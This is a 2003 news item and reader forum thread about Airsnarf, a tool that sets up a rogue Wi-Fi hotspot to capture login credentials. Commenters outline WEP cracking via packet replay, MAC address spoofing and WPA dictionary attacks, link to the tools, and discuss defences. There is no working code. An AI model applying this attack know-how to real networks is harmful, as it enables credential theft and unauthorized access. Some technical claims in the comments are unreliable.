dslreports logo
site
spacer

spacer
 
   
spc
story category
Out of Thin Air
Hacker tool allows Wi-Fi password grabs
by Karl Bode 10:47AM Wednesday Nov 26 2003
As Wi-Fi users anticipate better wireless security, a new tool allows a hacker to yank you from the web and grab your login information before you've even sipped your latte. "Airsnarf" is the latest utility to annoy wireless enthusiasts. The tool is the focus of attention this morning at both Computer User and DailyWireless.org. The tool, developed by a group that dubs themselves "the Shmoo Group", allows an individual to yank connectivity from an unsuspecting user. Then the tool broadcasts a powerful signal, mimics the network logon, and tricks the user into providing the hacker with their login data when they think they're logging back on to the wireless network.

The group naturally insists they didn't develop the tool with any deviant usage in mind, but instead hope to "demonstrate an inherent vulnerability of public 802.11b hot spots," according to the group's website (as if the tech community thought 802.11b was truly secure to begin with). The Daily Wireless report offers some potential solutions to users or WISPs hoping to avoid the tactic.

view:
topics flat nest 

IamZed
Premium
join:2001-01-10
Dayton, OH

Possible, but not probable

The creation of false sign in pages seems a bit obtuse. It’s not something you do as a drive by. I would hope people become familiar enough with this that when everyone is booted, let a sacrificial lamb try to log back on first.
--
A thing worth doing is worth doing to excess.

oliphant5
Got Identity?
Premium
join:2003-05-24
Corona, CA

Re: Possible, but not probable

Exactly...this isn't nothing new. This is just a twist on the spoofed email looking for AOLer's account info. Like most "hacks" this requires end user carelessness in order to succeed.
--
Don't get it, demand it! The Anime Network »www.theanimenetwork.com/index.html And something pretty good from the Cooler »elev.ru.orebro.se/ru0369/HAHAHAHA.MPG

LBDSL
Lightning Bolt

join:2002-01-07
Auburn Hills, MI

someone will always crack it.

No matter what you build, someone will crack it. It is the way the world works
--
Lightning Bolt Technologies

TexasGuy
49 States And Texas
Premium
join:2002-12-02
Houston, TX

Re: someone will always crack it.

said by LBDSL:
No matter what you build, someone will crack it. It is the way the world works

Right, go hack 256 bit DES key. Right. Easier to storm the safe and break it open.
--
Who drank has died, who drinks will die. Is he immortal who is sober?

skyfreedomdo
Premium
join:2003-01-01
Boise, ID

What do u mean 802.11b is not secure?!!!

I got WEP to protect me!!!!

ctceo
Premium
join:2001-04-26
South Bend, IN

Re: What do u mean 802.11b is not secure?!!!

Apparently you need to open your other eye.

skyfreedomdo
Premium
join:2003-01-01
Boise, ID

Re: What do u mean 802.11b is not secure?!!!

Apparently you need to c the humor!

ctceo
Premium
join:2001-04-26
South Bend, IN

Re: What do u mean 802.11b is not secure?!!!

Humor observed...

damonlab
Premium
join:2001-05-02
Detroit, MI

Re: What do u mean 802.11b is not secure?!!!

said by ctceo:
Humor observed...

lol

kba4

join:2001-10-23
Canton, OH
Reviews:
·Time Warner Cable

hot-spot providers take heed!!

we will not let you provide free/cheap access to just the 'special' individuals you know about! you have been warned!!

seriously, can anyone honesty have expected wi-fi to ever be secure? how can you make a broadcast 'secret' anyway? it's just an arms race between the 'hackers' and the providers/developers... i hope anyone investing in the hot-spot idea knows this going in, and will continue to fund what could someday become a utopia of free access anywhere in the country- even world. i don't care how much you encrypt the data, if it's broadcast, it can be seen by anyone, and the 'hacker' actually prefers not to be paid for his work, unlike the 9-5 sysadmin wo 'secures the network'. oh well, someone with more sense, please add to the discussion, i just saw the story and felt like posting:)
--
the USA is a weapon of mass destruction.

lazarus_

join:2002-08-31
Resolute, NU

Re: hot-spot providers take heed!!

said by kba4:
we will not let you provide free/cheap access to just the 'special' individuals you know about! you have been warned!!

seriously, can anyone honesty have expected wi-fi to ever be secure? how can you make a broadcast 'secret' anyway? it's just an arms race between the 'hackers' and the providers/developers... i hope anyone investing in the hot-spot idea knows this going in, and will continue to fund what could someday become a utopia of free access anywhere in the country- even world. i don't care how much you encrypt the data, if it's broadcast, it can be seen by anyone, and the 'hacker' actually prefers not to be paid for his work, unlike the 9-5 sysadmin wo 'secures the network'. oh well, someone with more sense, please add to the discussion, i just saw the story and felt like posting:)

Like my networking prof always says: "Anyone with a wet finger or metal clothing hanger can pickup your signal.."

Using WiFi you have the portability and easy of install but have to give up security.. If you have important info going over the network you should never use WiFi..

kapil
The Kapil

join:2000-04-26
Chicago, IL

Where...

...can I get me a copy of this thing?

Vamp
5c077
Premium
join:2003-01-28
MD
kudos:1

more hackers

by listing the name of the tool publicaly is only educating more people in hacking..

korym
Go Wisp's
ExMod 1999-03
join:1999-12-23
Richmond, VA

Re: more hackers

Oops.

Sisqo
World Champs. Babe Who?
Premium
join:2002-08-14
Methuen, MA
said by Vamp:
by listing the name of the tool publicaly is only educating more people in hacking..

This stinks, so how can someone really protect themselves? Now does this apply only to users that are using hotspots?
--
No it's not a payphone, it's a portable phone!
TheNerdShow

join:2003-11-16
Anchorage, AK

3 edits

Re: more hackers

This applies to home and business networks using popular wireless networking gear and using a form of encryption or password protection. The issue is moot since most people don't even bother to password protect their networks.
--
»thenerdshow.com »nerds.tk

gdead

@eisg.net

Defensive Techniques

Howdy,
So I've been involved in the Airsnarf project (I presented with Beetle at BlackHat Federal in DC a few months ago on the project). I've got a few things to say about this tool and the write-up about this.

First off, the type of attack that airsnarf carries out is not rocket science. It is not about breaking encryption but rather about tricking the client. The attack can be fully explained in about 5 minutes to a level that anyone with familiarity with 802.11 can fully understand it.

HOWEVER, not a single OS vendor, security tool provider, or driver vendor alert the user that this kind of attack is being performed. This is completely a layer 2 attack that should be caught by any wireless security tool. At the point of our talk at BH, nothing existed that would tell the user "hey, bad things are afoot... you should stop using this network". Airsnarf is a wakeup call to the vendors.

To that end, we also wrote the hotspot defense kit (HSDK). It's designed to alert the user that there is a layer 2 attack underway. It can be downloaded from the airsnaft page. Currently it only runs on OS X, but we are working on a windows port.

Finally, I am not a 3l337 blackhat hacker. I coauthored 802.11 Security through O'Reilly. I also try to educate as many people as I can about wireless security through talks, mailing lists, etc.

later

korym
Go Wisp's
ExMod 1999-03
join:1999-12-23
Richmond, VA

Re: Where...

»airsnarf.shmoo.com/

Also check out Airsnort too.

cinnamon
How Smart Is Your Card?
Premium
join:2002-01-19
Tulsa, OK
Of course from The Shmoo Group. You are running Red Hat Linux 9.0 aren't you?
Mr_Stealth
Premium
join:2001-05-18
Lucasville, OH
any Windows software like this?
my laptop's video card doesn't play well with Linux...I can't even use standard nVidia drivers with it, have to use Toshiba's

I've used NetStumbler, but it just finds networks
--
Say goodbye to your privacy and security.
Say no to TCPA/TCG/NGSCB

aSic
application specific
Premium
join:2001-05-17
Wakulla, FL

Re: Where...

lol... the video card makes no difference at a command line..

...unless you're the wussy type that *NEEDS* X to do anything useful.
Mr_Stealth
Premium
join:2001-05-18
Lucasville, OH

Re: Where...

lol
I just need to take the time to get it running on command line and then find the drivers
I'm fairly certain there are some working ones available

but I just tried to take the easy way out with Red Hat and Mandrake...got the through the install and gave it me a blank screen when it went to configure the video card

not like we really need to crack WEP keys...from what I have seen, most people don't have enough sense to use it anyway
--
Say goodbye to your privacy and security.
Say no to TCPA/TCG/NGSCB

skyfreedomdo
Premium
join:2003-01-01
Boise, ID

How long would it take to...

... break WEP 64 bit and 128 bit?
Any ideas or *shhh* experiences?
bmn
? ? ?
Premium,ExMod 2003-06
join:2001-03-15
hiatus

1 recommendation

Re: How long would it take to...

said by skyfreedomdo:
... break WEP 64 bit and 128 bit?

An hour or two on a REALLY busy network, several hours on a not-so-busy network and probably several days on one not used all that often. You have to capture a couple thousand to a million plus packets for some software.

As for this program, it didn't say whether or not you needed to get the WEP keys first or if the software does it for you by capturing and analyzing the packets. Of course that is assuming that your local WIFi providing cafe actually has WEP turned on, and from casual war driving, many don't.
--
Male by birth... Geek by choice. -- Man... Earth's most foolish child.

skyfreedomdo
Premium
join:2003-01-01
Boise, ID

Re: How long would it take to...

Good point on WEP not being used by many. How about TKIP (Temporal Key Integrity Protocol), as anyone read or applied it?
--
SKYFREEDOM NETWORKS
Whatever the angle; We've got you covered.

DSLDUDE6
Got The Folding Farm Itch
Premium
join:2002-01-07
Norcross, GA
I like my MAC filtering. I've tried everything to get past that, and you just can't get in. WEP, MAC, and common sense will prevail over all...
--
»www.fnort.com

skyfreedomdo
Premium
join:2003-01-01
Boise, ID

Re: How long would it take to...

I like MAC Filtering but theres always a chance of MAC SPOOFING!
But you are right common sense and, if I might add, knowledge of the enemy out there or within will prevail.
--
SKYFREEDOM NETWORKS
Whatever the angle; We've got you covered.
bmn
? ? ?
Premium,ExMod 2003-06
join:2001-03-15
hiatus
Its already been stated, but MAC spoofing will defeat MAC filtering. Most wireless cards have the ability to change the Mac address that is used by the card. I'd post a screenshot of how it can be done (its very easy), but the laptop is packed up in the car.
--
Male by birth... Geek by choice. -- Man... Earth's most foolish child.

BeesTea
Internet Janitor
Premium,VIP
join:2003-03-08
00000

Re: How long would it take to...

Sure, changing your MAC is not hard. That isn't spoofing and it isn't "defeating" anything at all. You're literally becoming a device allowed to connect to the WAP. Now here's the interesting part. Can you explain the process of knowing what to set your MAC to in order to gain access to the WAP ?

On the issue of WEP, it isn't intended to provide strong cryptographic communication. WEP means "Wired Equivalent Privacy". That is, just as a wire holds the signal, keeping it from being intercepted easily, WEP keeps signal from being eavesdropped on easily.

This is another example of why the physical layer is NOT where security is applied for the average network. Wireless or otherwise.

Cheers,
-BeesT
--
2b2b2b415448300d
bmn
? ? ?
Premium,ExMod 2003-06
join:2001-03-15
hiatus

Re: How long would it take to...

said by BeesTea:
Can you explain the process of knowing what to set your MAC to in order to gain access to the WAP ?
It would involve sniffing traffic on that WLAN. You would then be able to detect the MAC address of a system associated with the WLAN that is your target. I haven't actually done it (over the black hat stuff), so the mechanics of doing it are not 100% in my skillset, but the conceptual process can be found elsewhere.

quote:
That is, just as a wire holds the signal, keeping it from being intercepted easily, WEP keeps signal from being eavesdropped on easily.
That was its intended purpose, but some rely on it solely for access and information protection. I always grin when people fire up something like telnet and login via a wireless connection. Of course without WEP, a network is just waiting to be had.
--
Male by birth... Geek by choice. -- Man... Earth's most foolish child.

NotAHacker

@dbma.com

Re: How long would it take to...

How hard is it to spoof a MAC address? Well, if you have the software and knowledge to determine WEP keys, you already have everything you need to also learn all the authorized MAC addresses on that WLAN.

I'm not going into further detail, even though the info is widely available on the Internet.

BeesTea
Internet Janitor
Premium,VIP
join:2003-03-08
00000

1 edit
said by bmn:

It would involve sniffing traffic on that WLAN. You would then be able to detect the MAC address of a system associated with the WLAN that is your target. I haven't actually done it (over the black hat stuff), so the mechanics of doing it are not 100% in my skillset, but the conceptual process can be found elsewhere.

That's an interesting concept. It was my understanding that by frequency variation the clients were not able to see one another, hence the need for a WAP. Does this require the NIC to be in adhoc mode ? I wish I had more than just my laptop running on 802.11 here to play with.

I've been looking for a bit this evening and can't find any method that doesn't require using crazy radio frequency tools. There are some funky white papers on parsing radio streams in the unlicensed frequency ranges but they seem to be more "find the person snooping your cordless phone" type stuff.

If you happen to find anything on this please let me know, as that's not at all how I understood it to operate.

Cheers,
-BeesT

OK, I've scoured the seatle wireless mailing list archive and it seems my understanding of how this works is based on modern 802.11 card implimentations. Newer cards aparently make it non-trivial to intercept packets on the way to the WAP or vice-verse. Presumably older cards with new firmware would also reduce this risk.
--
2b2b2b415448300d

sporkme
drop the crantini and move it, sister
Premium,MVM
join:2000-07-01
Morristown, NJ
said by BeesTea:
Now here's the interesting part. Can you explain the process of knowing what to set your MAC to in order to gain access to the WAP ?
Just run your favorite sniffer for a while. The frame headers are NOT encrypted when WEP is enabled. So it's actually pretty easy. I've been toying with "KisMac" and it's pretty simple. It's totally point-n-drool. Right click on a node and there's a menu item "Find Key". With a moderate amount of traffic this happens in less than a half hour.

WEP is fundamentally broken. I don't mind the idea of encrypting at L2, but they chose a very weak algorithm.
--
just a minute

aitech
Guru. Kneel

join:2000-12-19
Boston, MA

Re: How long would it take to...

Has anyone gotten a successful port of Kismet into windows yet, or is it still alpha?

And anyone have any idea when netstumbler .4 is coming yet?

DenverDialup

join:2003-06-06
Littleton, CO
Well, consider too that WPA is becoming the new standard in wireless security. I don't see why Shmoo has to go write another hacking/phreaking/wardriving tool to "prove an inherent insecurity in 802.11b"...anyone who's spent more than a day looking at wireless technologies today knows how insecure it is. Why not take that effort and translate it into something more useful -- like actually working to make WiFi more secure?
--
"Programming today is a race between software engineers striving to build bigger and better idiot-proof programs, and the Universe trying to produce bigger and better idiots. So far, the Universe is winning." -- Rich Cook
bmn
? ? ?
Premium,ExMod 2003-06
join:2001-03-15
hiatus

Re: How long would it take to...

said by DenverDialup:
Well, consider too that WPA is becoming the new standard in wireless security.
An article came out not long ago that stated that WPA is not much more secure than WEP and can still be broken.
--
Male by birth... Geek by choice. -- Man... Earth's most foolish child.
shmoe1

join:2003-09-06
Fremont, CA

Re: How long would it take to...

One article about WPA vulnerability I've encountered was by Robert Moskowitz, senior technical director at ICSA Labs.

It details problems with the pre-shared key of less than 20 characters with simple pass phrases that were vulnerable to a dictionary attack. Complex passphrases of longer than 20 characters seem to be less of a security issue.

Also, I also read that WPA is just as vulnerable as WEP to denial-of-service attacks.

If others can point to other articles or specific problems it would be useful.

Thanx

gruggni
Oxygen Gets You High

join:2003-07-28
Corpus Christi, TX

No need to panic

Tools like this have been around for a while. You only need to use the tool if someone has encryption turn on. Majority of residential wifi networks are already open. Really no need for worries. Very few wifi networks are actually encrypted.

Tools like this are used to break encryption. Anyone with malicious intent will just go to the open wifi network instead of an encrypted one. Breaking encryption takes time.
How else do you test encryption works? You make a tool to break it. If someone is trying to sell me wifi equipment and they say its secure, I want a way to test the encryption instead of taking someones word for it.
--
When I read about the evils of drinking, I gave up reading. --Henny Youngman

Rhobite
Premium
join:2002-02-24
Waltham, MA

Re: No need to panic

This tool has NOTHING to do with breaking encryption. It's a password-gathering tool, it puts up a fake login page just like you'd get from a T-Mobile or Verizon hotspot. Hotspots don't use WEP or WPA anyway, they are unencrypted. This tool just makes it easy to set up a rogue AP and fish for people's logins. The reason you can't just passively sniff for passwords is that I assume the real login pages are sent over SSL. Although I've never used a pay hotspot so I could be wrong.

reub2000
Premium
join:2001-12-28
Evanston, IL

I'll continue to use 10/100 Ethernet.

This type of attack would be impossible on ethernet. And I get 100Mbps instead of about 50MBps.

•••

Mike
Premium,Mod
join:2000-09-17
Pittsburgh, PA
kudos:1
Reviews:
·Verizon FiOS

Playing with stuff Bill doesn't want you to have

All the cracking / hacking stuff is for unix based OS's.

There is no way in hell anyone would want to release something for windows. Thus, instead of precompiled hoopla.. you have to compile it a certain way. Thus, only someone who has the skill and knows their way around gcc can use it. That can be seen as a good thing and a bad thing... good: not everyone can use it.. bad: if they can use it, they can also own you in about 20 seconds.
--
Everyone is entitled to their opinion. Of course, they're entitled to be blithering idiots at the same time.
What this country needs is a good five dollar plasma weapon.
PhragX

join:2001-11-01

Re: Playing with stuff Bill doesn't want you to have

incorrect - there is a windows port of airsnort (for defeating WEP)

»airsnort.shmoo.com/windows.html

many tools such as ethereal/tcpdump are ported to windows, and there is of course netstumbler.

www.packetstormsecurity.nl have also posted (exploit)code that is easily compiled (or precompiled) for windows systems.

dilettante

join:2002-01-01
Haslett, MI

Want security? Just stay under their "radar"

I continue to use HomeRF here at home. As far as I know an 802.11 radio can't even see it. It's slow but cheap. Now to get hold of some HomeRF 2 gear!

Just doesn't always pay to be one of the cool kids I guess.

My thanks to Ashcroft or whoever chose to suppress the technology. ...tongue in cheek guys, really!

mimick

@lax1-4.xx.17.xx.lax1

broadband

does anyone know how to open up your broad band more to get more speed

v3xproof

@afspc.af.mil

WEP vs WPA

On a not so busy network it could be as little as 15 minutes to crack. The reason why is a little tool called AirReply. A knowledgable person can grab a good packet from the little traffic and just resend it over and over. The AP then send information back over and over (generating tons of initialization vectors needed to crack the WEP key). After about 15 minutes and 300,000 replayed packets later it will only take about 30 seconds to crack the actual key. WPA is way more susceptable to DoS attacks IMHO. Why? Because WPA does not like replay attacks. If it detects one, it will disconnect that user... get the picture. At Defcon the Shmoo Group created a "WiFi Handgrenade". lol. They took a pda and just had it replay all traffic... You take it from there. About actually cracking WPA. I do believe that there is only one weekness with it known as of today (At least with AES, but dont quote me on this)... User's picking weak passkeys which allow it to be cracked with a dictionary file. Choosing a passkey of 60 characters with absolutely no words, numbers, upper/lower case, and special characters will make it take longer to crack. Changing you passkey often should prevent this attack. Mac filtering is bullshit. If you want to get the most secure wireless you can, my suggestion... Use WPA or WPA2 with AES. Make the user then have to VPN to get on the network (Now they have to get creditials). When browsing try to use ssl as much as possible. When chatting, try using an encrypted chat program. Etc... Now about Shmoo, they arent doing what they do to make people's lives miserable; they do it to educate dumb people. People that buy into any corperations bullshit about how secure their wireless products are. And about secure wireless networks... Their is one. Its called SecNet 11. It is what the government uses. I dont know much about it other then what I found on the internet. I know that a single wireless card runs in the thousands. If you want to know why I say its secure (for now) is its approved to transmit up to Secret. I doubt the government would allow that to transmitted over unsecure means (at least I hope not). Hope I helped to clear up some misconceptions.

v3xproof

@afspc.af.mil

Re: WEP vs WPA

Whoops, meant to post this in reply to »Out of Thin Air
Sorry